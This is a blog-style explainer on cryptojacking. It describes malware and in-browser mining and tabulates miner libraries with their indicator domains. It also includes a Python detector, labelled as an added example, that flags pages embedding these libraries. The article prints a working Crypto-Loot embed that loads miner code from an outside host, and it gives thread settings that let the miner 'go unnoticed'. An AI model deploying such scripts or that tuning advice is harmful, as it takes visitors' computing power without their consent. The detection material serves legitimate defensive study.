CPU Usage. Photo by Alberto Duo on Unsplash: https://unsplash.com/photos/e4rcg33x4fA

Cryptojacking, a real malware?

Understanding cryptojacking "malware".
This time, we will explain the different types of cryptojacking, show an example together with its basic configuration, and discuss the legal use of cryptojacking and the advantages of implementing it in an application.
Diego Alvarez
documentation
2019-08-25



Before discussing the concept, we need a brief definition of blockchain. It is simply a unique, consensus-based, distributed ledger on the network that stores information which cannot be modified, lost or deleted. It is used in the health sector, smart contracts, intellectual property management, and cryptocurrencies, the latter being the most common use.

In the field of cryptocurrencies, a blockchain stores all transactions made with a cryptocurrency. The security and integrity of these systems are maintained by nodes, computers connected to the blockchain network that compete with each other to verify transactions. This process is known as mining and is carried out by contributing processing power from CPUs, GPUs, or hardware specialized for this type of task.

Usually, nodes associate with each other and form groups (pools) that work together to validate a batch of transactions. When these transactions are validated, each node is rewarded in proportion to the processing power it contributed.

Concept

When mining cryptocurrency, keep in mind that the percentage of GPU or CPU usage increases, and so does electricity consumption.

Now, what if I told you that others can supply that processing power for you, and even better, without you having to share the profits with them? It sounds pretty good, and it is simple to implement, with two variations.

  • The first is carried out by infecting a victim’s machine with malware. Usually, this is done through social engineering: the victim is led, without their knowledge, to download malware that executes the mining process in the background.

  • The other variation is in-browser mining. This executes code in the user’s browser when the user is accessing a particular site. In this case, JavaScript is used to execute such scripts.

Discussion

Some people prefer that their CPU be used 100% of the time, without having to deal with ads and pop-ups on every new page.

On the other hand, antivirus companies periodically update their definition of malware, and include web miners as a potential threat to a user’s system.

According to Cointelegraph [1], Monero, the currency most affected by excessive mining, plans to reinforce its algorithm by requiring miners to dedicate over two gigabytes of RAM to the process, which could make cryptojacking attempts harder to hide.

How these scripts are used determines whether they are legal or not. There are cases where attackers inject the code into websites through XSS, generating profits for themselves and, of course, without the consent of the website administrator.

As noted above, with social engineering techniques, the attacker could make victims download malicious programs to perform mining without consent.

Tools

There are many tools that can be used to perform in-browser mining. Coinhive had been one of the most used, but since March 2019 it has stopped working.

However, there are other tools that are quite similar. Table 1 below, based on a scan made with PublicWWW, shows the approximate number of websites using each of these tools.

Table 1. Quantity of websites per library [2]

Website            Results   Query parameter
Coinhive           30611     "coinhive.min.js"
JSEcoin            1131      "load.jsecoin.com"
Crypto-Loot        695       "CryptoLoot.Anonymous"
Minr               324       "minr.pw", "st.kjli.fi", "abc.pema.cl", "metrika.ron.si", "cdn.rove.cl", "host.d-ns.ga", "static.hk.rs", "hallaert.online", "cnt.statistic.date", "cdn.static-cnt.bid"
CoinImp            317       "www.coinimp.com/scripts/min.js"
ProjectPoi (PPoi)  116       "projectpoi.min"
AFMiner            46        "afminer.com/code/miner.php"
Papoto             42        "papoto.com/lib/papoto.js"

In the following example, a test is shown using Crypto-Loot, a library that is replacing the now-defunct Coinhive. It is very easy to implement in any application by inserting the following code.

In-Browser mining script

<script src="//statdynamic.com/lib/crypta.js"></script>
<script>
  // The site key identifies the account that receives the mined coins
  var miner = new CRLT.Anonymous('15837bc7758859e913c5ccc2d292a9f1e54775389d5',
    { threads: 4, throttle: 0.2, coin: "xmr" } // 4 worker threads, idle 20% of the time, mining Monero
  );
  miner.start();
</script>

When a user visits the application, the processing load rises very quickly. The recommended thread value for the script to go unnoticed is between 2 and 4. The throttle defines the fraction of time the threads stay idle, so a throttle of 0.2 allows up to 80% CPU usage; 0.0 is full speed and is the least recommended value.
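Putting the Table 1 indicators and the constructor pattern above to defensive use, here is an added example (not part of the original article) of a small scanner that flags a page embedding one of these libraries and reports the threads/throttle budget it requests. The sample page and its site key are constructed for the test; the regex assumes the Coinhive-style `new <Lib>.Anonymous('<key>', { ... })` shape shown above.

```python
import re
from typing import Optional

# Indicator strings from Table 1 (the PublicWWW query parameters), plus the
# statdynamic.com host and CRLT constructor used by the Crypto-Loot snippet.
MINER_INDICATORS = {
    "Coinhive": ["coinhive.min.js"],
    "JSEcoin": ["load.jsecoin.com"],
    "Crypto-Loot": ["CryptoLoot.Anonymous", "CRLT.Anonymous", "statdynamic.com/lib/crypta.js"],
    "Minr": ["minr.pw", "st.kjli.fi", "abc.pema.cl", "metrika.ron.si", "cdn.rove.cl",
             "host.d-ns.ga", "static.hk.rs", "hallaert.online", "cnt.statistic.date",
             "cdn.static-cnt.bid"],
    "CoinImp": ["www.coinimp.com/scripts/min.js"],
    "ProjectPoi": ["projectpoi.min"],
    "AFMiner": ["afminer.com/code/miner.php"],
    "Papoto": ["papoto.com/lib/papoto.js"],
}

# Coinhive-style constructor: new <Lib>.Anonymous('<site key>', { options })
MINER_CTOR = re.compile(
    r"""new\s+\w+\.Anonymous\(\s*['"]([0-9a-f]+)['"]\s*(?:,\s*(\{[^}]*\}))?""", re.IGNORECASE)

def _opt_number(opts: str, name: str) -> Optional[float]:
    """Pull a numeric option (threads, throttle) out of the options literal."""
    m = re.search(rf"\b{name}\s*:\s*([0-9.]+)", opts)
    return float(m.group(1)) if m else None

def scan_html(html: str) -> dict:
    """Report which miner families a page embeds and the CPU budget it asks for."""
    found = sorted(f for f, needles in MINER_INDICATORS.items()
                   if any(n in html for n in needles))
    result = {"families": found, "config": None}
    m = MINER_CTOR.search(html)
    if m:
        opts = m.group(2) or ""
        threads, throttle = _opt_number(opts, "threads"), _opt_number(opts, "throttle")
        result["config"] = {
            "site_key": m.group(1)[:6] + "...",   # masked: identifies the beneficiary
            "threads": int(threads) if threads is not None else None,
            "throttle": throttle,
            # throttle is the idle fraction, so CPU per thread is the remainder
            "cpu_per_thread_pct": None if throttle is None else round((1 - throttle) * 100),
        }
    return result

# Constructed sample page (placeholder key, not a real site key)
SAMPLE_PAGE = """<html><body>
<script src="//statdynamic.com/lib/crypta.js"></script>
<script>
  var miner = new CRLT.Anonymous('00000000000000000000000000000000deadbeef00',
    { threads:4,throttle:0.2, coin: "xmr" });
  miner.start();
</script></body></html>"""
```

Running `scan_html(SAMPLE_PAGE)` flags Crypto-Loot with 4 threads at 80% CPU each, while a page without any indicator returns an empty family list.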

Figure 1. CPU usage while visiting a website with an in-browser mining script.

Collected earnings and processing power can be seen on the dashboard of the person who inserted the script.

Conclusion

The use of this type of service, such as Crypto-Loot, can be legal. They are considered malware when run on users' systems without the users' knowledge. It is our responsibility to inform users about what is happening and to provide them with statistics on the processing power mined.

In order for these mining methods to be legitimate and therefore, legal, users must receive a notification about the execution of these scripts, as well as the option to disable them and stop mining.

So far, there are few websites where the user is not actually informed of the use of these scripts. Here is where antivirus companies disagree. Some antivirus companies believe excessive CPU usage can cause intentional damage, while others believe there is no intention to harm an infected machine’s files; they just make the machine work a little slower.

Without a doubt, no one wants their machine to work slower, but with proper configuration of the scripts, you can achieve a website that generates profits without having to show annoying ads to visitors and without exceeding CPU usage.

References

  1. Cointelegraph. Monero Developers Consider Adopting New Proof-of-Work Algorithm in October.

  2. S. Eskandari, A. Leoutsarakos, T. Mursch and J. Clark (2018). A First Look at Browser-Based Cryptojacking. 2018 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), 63.



Diego Alvarez

Systems and Telecommunications Engineer student

"Blessed is the man who expects nothing, because he will never be disappointed." Alexander Pope


